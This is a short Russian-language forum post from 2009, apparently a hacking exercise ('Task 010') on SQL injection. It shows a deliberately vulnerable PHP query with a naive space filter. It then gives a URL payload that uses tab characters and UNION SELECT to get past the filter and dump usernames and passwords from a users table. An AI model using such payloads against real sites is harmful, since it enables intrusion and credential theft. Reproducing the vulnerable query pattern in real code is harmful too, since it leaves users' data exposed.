22.06.2009, 02:16
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
С нами:
10467109
Репутация:
222
|
|
Задание 010
Провести sql injection
PHP код:
<?php
$name = str_replace('/**/','','str_replace(' ','',$_GET['name']));
$query = mysql_query("select * from users where name='$name"); ?>
Код:
http://site.com/index.php?name=union%09select%091,2,CONCAT_WS(':',name,passwd),4,5,6%09from%09users/*
Последний раз редактировалось Extremal; 22.06.2009 в 02:18..
|
|
|